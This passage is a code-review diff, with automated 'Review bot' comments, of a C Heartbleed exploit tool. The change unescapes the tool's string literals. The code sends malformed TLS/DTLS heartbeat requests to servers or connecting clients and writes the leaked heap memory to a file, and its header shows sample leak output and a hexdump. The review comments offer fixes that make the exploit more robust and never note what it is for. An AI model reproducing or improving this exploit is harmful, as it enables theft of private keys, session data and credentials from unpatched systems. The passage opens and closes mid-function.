if(ihost==0){
|
||||
ihost = 1;
|
||||
host = malloc(strlen(optarg)+1);
|
||||
if(host==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
sprintf(host,\\\"%s\\\",optarg);
|
||||
sprintf(host,"%s",optarg);
|
||||
bind = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'c\\\':
|
||||
case 'c':
|
||||
if(iprecmd == 0){
|
||||
iprecmd = 1;
|
||||
precmd = atoi(optarg);
|
||||
}
|
||||
break;
|
||||
case \\\'v\\\':
|
||||
case 'v':
|
||||
verbose = 1;
|
||||
break;
|
||||
case \\\'l\\\':
|
||||
case 'l':
|
||||
loop = 1;
|
||||
break;
|
||||
default:
|
||||
|
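Review bot: `static struct option options[]` ends with `{"help", 0, 0,'h'}` and no all-zero terminator; `getopt_long` scans the array until it finds an element whose `name` is NULL, so an unrecognised long option walks off the end of the array. Add `{0, 0, 0, 0}` as the last element. Two smaller points in the same hunk: `sprintf(host,"%s",optarg);` into `malloc(strlen(optarg) + 1)` is correctly sized but `strcpy` or `strdup` says it more plainly, and `--server` and `--bind` both gate on `ihost`, so whichever option appears first wins and the other is silently ignored; either reject the combination or document it.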
@ -620,7 +620,7 @@ int main(int argc, char* argv[]){
|
|||
}
|
||||
}
|
||||
if(ihost==0||iport==0||ifile==0||itype==0||type < 0){
|
||||
printf(\\\"[ try --help\\\\n\\\");
|
||||
printf("[ try --help\n");
|
||||
exit(0);
|
||||
}
|
||||
ssl_init();
|
||||
|
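Review bot: the guard `type < 0` in `if(ihost==0||iport==0||ifile==0||itype==0||type < 0)` is always false if `type` is declared unsigned to match `heartbleed(connection *c,unsigned int type)`, and the compiler will warn about it; `type = atoi(optarg);` earlier also accepts non-numeric input as 0. Parse with `strtoul` and an end-pointer check, and drop the unsigned comparison.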
@ -633,7 +633,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
while(loop==1){
|
||||
printf(\\\"[ entered heartbleed loop\\\\n\\\");
|
||||
printf("[ entered heartbleed loop\n");
|
||||
first=0;
|
||||
repeat=1;
|
||||
heartbleed(c,type);
|
||||
|
@ -641,7 +641,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
}
|
||||
printf(\\\"[ done.\\\\n\\\");
|
||||
printf("[ done.\n");
|
||||
exit(0);
|
||||
}
|
||||
else{
|
||||
|
@ -650,7 +650,7 @@ int main(int argc, char* argv[]){
|
|||
while(1){
|
||||
sd=accept(ret,0,0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] FATAL: problem with accept()\\\\n\\\");
|
||||
printf("[!] FATAL: problem with accept()\n");
|
||||
exit(0);
|
||||
}
|
||||
if(pid=fork()){
|
||||
|
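Review bot: `if(pid=fork()){` treats a failed `fork()` (return value -1) the same as the parent branch, so on fork failure the parent carries on as though a child were handling the accepted socket, and the assignment inside the condition reads like a mistyped `==`. Write `pid = fork(); if(pid < 0){ perror("fork"); close(sd); continue; } if(pid > 0){ ... }`. The `accept()` failure path uses `exit(0)` after a `FATAL` message; `exit(1)` is consistent with a fatal error.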
@ -664,7 +664,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
while(loop==1){
|
||||
printf(\\\"[ entered heartbleed loop\\\\n\\\");
|
||||
printf("[ entered heartbleed loop\n");
|
||||
first=0;
|
||||
repeat=0;
|
||||
heartbleed(c,type);
|
||||
|
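Review bot: this server-side loop sets `repeat=0;` before `heartbleed(c,type);`, while the client-side loop at the same point earlier in `main` sets `repeat=1;`. If the difference is deliberate (the header warns that connecting clients often close after a large request) it needs a comment saying so; if not, one of the two assignments is a typo.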
@ -672,7 +672,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
}
|
||||
printf(\\\"[ done.\\\\n\\\");
|
||||
printf("[ done.\n");
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
|
|
|
@ -16,7 +16,7 @@
|
|||
* and can be run in a loop until the connected peer ends connection.
|
||||
* The data leaked contains 16 bytes of random padding at the end.
|
||||
* The exploit can be used against a connecting client or server,
|
||||
* it can also send pre_cmd\\\'s to plain-text services to establish
|
||||
* it can also send pre_cmd's to plain-text services to establish
|
||||
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
|
||||
* will often forcefully close the connection during large leak
|
||||
* requests so try to lower your payload request size.
|
||||
|
@ -35,23 +35,23 @@
|
|||
* [ decrypting SSL packet
|
||||
* [ heartbleed leaked length=65535
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16381 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16381 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=42
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=18
|
||||
* [ wrote 18 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 18 bytes of heap to file 'out'
|
||||
* [ done.
|
||||
* $ ls -al out
|
||||
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
|
||||
|
@ -60,11 +60,11 @@
|
|||
*
|
||||
* Use following example command to generate certificates for clients.
|
||||
*
|
||||
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\\
|
||||
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
|
||||
* -keyout server.key -out server.crt
|
||||
*
|
||||
* Debian compile with \\\"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\\
|
||||
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\\\"
|
||||
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
|
||||
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
|
||||
*
|
||||
* todo: add udp/dtls support.
|
||||
*
|
||||
|
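Review bot: the `openssl req ... -nodes` example writes `server.key` unencrypted, and the code loads it from the relative path `./server.key` (see the `SSL_CTX_use_PrivateKey_file` calls in `dtls_server` and `tls_bind`), so the comment should add `chmod 600 server.key` and state that the program must be started from that directory. The line `todo: add udp/dtls support.` is stale: this same file already defines `dtls_server`, `dtls_client` and `dtlsheartbleed`.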
@ -87,7 +87,7 @@
|
|||
* [ decrypting SSL packet
|
||||
* [ heartbleed leaked length=1336
|
||||
* [ final record type=24, length=1355
|
||||
* [ wrote 1352 bytes of heap to file \\\'eshta\\\'
|
||||
* [ wrote 1352 bytes of heap to file 'eshta'
|
||||
*
|
||||
*
|
||||
* # hexdump -C eshta
|
||||
|
@ -120,20 +120,20 @@
|
|||
* [ decrypting SSL packet
|
||||
* [ heartbleed leaked length=1336
|
||||
* [ final record type=24, length=1355
|
||||
* [ wrote 1352 bytes of heap to file \\\'eshta\\\'
|
||||
* [ wrote 1352 bytes of heap to file 'eshta'
|
||||
*
|
||||
*
|
||||
* # hexdump -C eshta
|
||||
* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|
|
||||
* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\\\".(n|
|
||||
* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...".(n|
|
||||
* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|
|
||||
* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|
|
||||
* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\\\.h.|
|
||||
* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\.h.|
|
||||
* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|
|
||||
* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|
|
||||
* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|
|
||||
* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|
|
||||
* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..\\\'H...|
|
||||
* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|
|
||||
* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|
|
||||
* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_|
|
||||
* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|
|
||||
|
@ -142,20 +142,20 @@
|
|||
* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|
|
||||
* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|
|
||||
* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |
|
||||
* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\\\"0...*.H..|
|
||||
* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0.."0...*.H..|
|
||||
* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|
|
||||
* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|
|
||||
* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|
|
||||
* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|
|
||||
* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\\\....|
|
||||
* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\....|
|
||||
* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|
|
||||
* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|
|
||||
* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|
|
||||
* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|
|
||||
* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|
|
||||
* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|
|
||||
* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.\\\'f.]UM..q..|
|
||||
* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\\\?...a,...|
|
||||
* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|
|
||||
* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\?...a,...|
|
||||
* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|
|
||||
* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|
|
||||
* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|
|
||||
|
@ -168,21 +168,21 @@
|
|||
* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|
|
||||
* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|
|
||||
* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....|
|
||||
* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.\\\'..K..|
|
||||
* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|
|
||||
* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|
|
||||
* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|
|
||||
* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\\\"..m!./.....\\\\.D|
|
||||
* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |."..m!./.....\.D|
|
||||
* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j|
|
||||
* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|
|
||||
* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\\\"|
|
||||
* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e...."|
|
||||
* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I|
|
||||
* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|
|
||||
* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|
|
||||
* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|
|
||||
* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|
|
||||
* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\\\"gf.\\\"...1...;|
|
||||
* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q."gf."...1...;|
|
||||
* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|
|
||||
* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..\\\'...(8?.|
|
||||
* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|
|
||||
* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|
|
||||
* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
|
||||
* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
|
||||
|
@ -214,9 +214,9 @@
|
|||
#include <openssl/rand.h>
|
||||
#include <openssl/buffer.h>
|
||||
|
||||
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\\
|
||||
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
|
||||
(((unsigned int)(c[1])) )),c+=2)
|
||||
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\\
|
||||
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
|
||||
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
|
||||
|
||||
int first = 0;
|
||||
|
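Review bot: the old side of the `n2s`/`s2n` definitions ended in `\\\\`, i.e. two backslashes, which is a stray token rather than a line continuation, so these macros are the clearest proof the file did not compile before this change. Their parameters are used unparenthesised (`c[0]`, `c+=2`), so they only work when `c` is a plain pointer variable; a comment noting that they mirror OpenSSL's internal `n2s`/`s2n` from `ssl_locl.h`, with the same restriction, would stop someone from passing an expression.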
@ -261,20 +261,20 @@ int tcp_connect(char* server,int port){
|
|||
host = gethostbyname(server);
|
||||
sd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
sa.sin_addr = *((struct in_addr *) host->h_addr);
|
||||
bzero(&(sa.sin_zero),8);
|
||||
printf(\\\"[ connecting to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[ connecting to %s %d/tcp\n",server,port);
|
||||
ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
|
||||
if(ret==0){
|
||||
printf(\\\"[ connected to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[ connected to %s %d/tcp\n",server,port);
|
||||
}
|
||||
else{
|
||||
printf(\\\"[!] FATAL: could not connect to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
|
||||
exit(0);
|
||||
}
|
||||
return sd;
|
||||
|
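Review bot: `host = gethostbyname(server);` is not checked for NULL before `host->h_addr` is dereferenced in `sa.sin_addr = *((struct in_addr *) host->h_addr);`, so an unresolvable name crashes instead of reaching the `FATAL` message this function prints for other failures. `main` validates `-s` once, but `tcp_connect` and `tcp_bind` resolve the name again without the check; `dtls_server` in the same file shows the pattern to copy (`if ((host = gethostbyname(server)) == NULL)`). `bzero` and `gethostbyname` are both legacy; `memset` and `getaddrinfo` are the portable replacements.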
@ -287,7 +287,7 @@ int tcp_bind(char* server, int port){
|
|||
host = gethostbyname(server);
|
||||
sd=socket(AF_INET,SOCK_STREAM,0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(&sin,0,sizeof(sin));
|
||||
|
@ -297,7 +297,7 @@ int tcp_bind(char* server, int port){
|
|||
setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
|
||||
ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
|
||||
if(ret==-1){
|
||||
printf(\\\"[!] cannot bind socket\\\\n\\\");
|
||||
printf("[!] cannot bind socket\n");
|
||||
exit(0);
|
||||
}
|
||||
listen(sd,5);
|
||||
|
@ -314,35 +314,35 @@ connection* dtls_server(int sd, char* server,int port){
|
|||
struct sockaddr_in sa;
|
||||
unsigned long addr;
|
||||
if ((host = gethostbyname(server)) == NULL) {
|
||||
perror(\\\"gethostbyname\\\");
|
||||
perror("gethostbyname");
|
||||
exit(1);
|
||||
}
|
||||
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
sa.sin_addr = *((struct in_addr *) host->h_addr);
|
||||
if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
|
||||
perror(\\\"bind()\\\");
|
||||
perror("bind()");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
BIO *bio;
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buf,0,4096);
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
c->socket = sd;
|
||||
|
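Review bot: `if(c==NULL){` directly after `BIO *bio;` runs before `c = malloc(sizeof(connection));` later in the same hunk, so it tests an uninitialised pointer (undefined behaviour) and the real allocation failure is only caught by the second check; delete the first one. Likewise `if(buf==NULL){` is followed by `memset(buf,0,4096);` but no `buf = malloc(4096);` appears in this hunk, whereas `tls_bind` allocates it in the lines shown; confirm `buf` is allocated in the part of `dtls_server` not shown here, or add the allocation before the test.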
@ -353,10 +353,10 @@ connection* dtls_server(int sd, char* server,int port){
|
|||
if(c->sslContext==NULL)
|
||||
ERR_print_errors_fp(stderr);
|
||||
SSL_CTX_SRP_CTX_init(c->sslContext);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, \\\"./server.crt\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, \\\"./server.key\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
|
||||
if(!SSL_CTX_check_private_key(c->sslContext)){
|
||||
printf(\\\"[!] FATAL: private key does not match the certificate public key\\\\n\\\");
|
||||
printf("[!] FATAL: private key does not match the certificate public key\n");
|
||||
exit(0);
|
||||
}
|
||||
c->sslHandle = SSL_new(c->sslContext);
|
||||
|
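Review bot: only `SSL_CTX_check_private_key` is checked here; `SSL_CTX_use_certificate_file` and `SSL_CTX_use_PrivateKey_file` return 1 on success and their results are discarded, so a missing `./server.crt` surfaces only as the misleading `private key does not match the certificate public key` message. Check each return value and call `ERR_print_errors_fp(stderr)` as the lines above already do for the context. The same pattern recurs in `tls_bind`.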
@ -370,12 +370,12 @@ connection* dtls_server(int sd, char* server,int port){
|
|||
SSL_set_accept_state (c->sslHandle);
|
||||
|
||||
int rc = SSL_accept(c->sslHandle);
|
||||
printf (\\\"[ SSL connection using %s\\\\n\\\", SSL_get_cipher (c->sslHandle));
|
||||
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
|
||||
// bytes = SSL_read(c->sslHandle, buf, 4095);
|
||||
// printf(\\\"[ recieved: %d bytes - showing output\\\\n%s\\\\n[\\\\n\\\",bytes,buf);
|
||||
// printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
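Review bot: `!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED` parses as `(!tlsext_heartbeat) & SSL_TLSEXT_HB_ENABLED` because `!` binds tighter than `&`; it only gives the intended answer because `SSL_TLSEXT_HB_ENABLED` is bit 0. Write `!(c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED)`; the identical expression appears in `tls_connect`, `dtls_client` and `tls_bind`. `int rc = SSL_accept(c->sslHandle);` is also never read, so a failed handshake still prints `[ SSL connection using %s` with whatever `SSL_get_cipher` returns.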
@ -392,7 +392,7 @@ connection* tls_connect(int sd){
|
|||
connection *c;
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
c->socket = sd;
|
||||
|
@ -411,7 +411,7 @@ connection* tls_connect(int sd){
|
|||
ERR_print_errors_fp(stderr);
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
@ -424,25 +424,25 @@ connection* dtls_client(int sd, char* server,int port){
|
|||
memset((char *)&sa,0,sizeof(sa));
|
||||
c = malloc(sizeof(connection));
|
||||
if ((host = gethostbyname(server)) == NULL) {
|
||||
perror(\\\"gethostbyname\\\");
|
||||
perror("gethostbyname");
|
||||
exit(1);
|
||||
}
|
||||
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
sa.sin_addr = *((struct in_addr *) host->h_addr);
|
||||
if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
|
||||
perror(\\\"connect()\\\");
|
||||
perror("connect()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
BIO *bio;
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -463,13 +463,13 @@ connection* dtls_client(int sd, char* server,int port){
|
|||
BIO_ctrl_set_connected(bio, 1, &sa);
|
||||
SSL_set_bio(c->sslHandle, bio, bio);
|
||||
SSL_set_connect_state (c->sslHandle);
|
||||
//printf(\\\"eshta\\\\n\\\");
|
||||
//printf("eshta\n");
|
||||
if(SSL_connect(c->sslHandle)!=1)
|
||||
ERR_print_errors_fp(stderr);
|
||||
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway), %d \\\\n\\\",c->sslHandle->tlsext_heartbeat);
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway), %d \n",c->sslHandle->tlsext_heartbeat);
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
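Review bot: after `if(SSL_connect(c->sslHandle)!=1) ERR_print_errors_fp(stderr);` execution continues and returns `c` as though the handshake succeeded, so the caller writes heartbeats on a DTLS connection that was never established; return NULL (or exit) on failure, as the `perror`/`exit` paths above do for socket errors. The commented-out `//printf("eshta\n");` is leftover debugging and should be dropped rather than carried through the unescape.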
@ -480,13 +480,13 @@ connection* tls_bind(int sd){
|
|||
char* buf;
|
||||
buf = malloc(4096);
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buf,0,4096);
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
c->socket = sd;
|
||||
|
@ -497,10 +497,10 @@ connection* tls_bind(int sd){
|
|||
ERR_print_errors_fp(stderr);
|
||||
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
|
||||
SSL_CTX_SRP_CTX_init(c->sslContext);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, \\\"./server.crt\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, \\\"./server.key\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
|
||||
if(!SSL_CTX_check_private_key(c->sslContext)){
|
||||
printf(\\\"[!] FATAL: private key does not match the certificate public key\\\\n\\\");
|
||||
printf("[!] FATAL: private key does not match the certificate public key\n");
|
||||
exit(0);
|
||||
}
|
||||
c->sslHandle = SSL_new(c->sslContext);
|
||||
|
@ -509,12 +509,12 @@ connection* tls_bind(int sd){
|
|||
if(!SSL_set_fd(c->sslHandle,c->socket))
|
||||
ERR_print_errors_fp(stderr);
|
||||
int rc = SSL_accept(c->sslHandle);
|
||||
printf (\\\"[ SSL connection using %s\\\\n\\\", SSL_get_cipher (c->sslHandle));
|
||||
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
|
||||
bytes = SSL_read(c->sslHandle, buf, 4095);
|
||||
printf(\\\"[ recieved: %d bytes - showing output\\\\n%s\\\\n[\\\\n\\\",bytes,buf);
|
||||
printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
|
||||
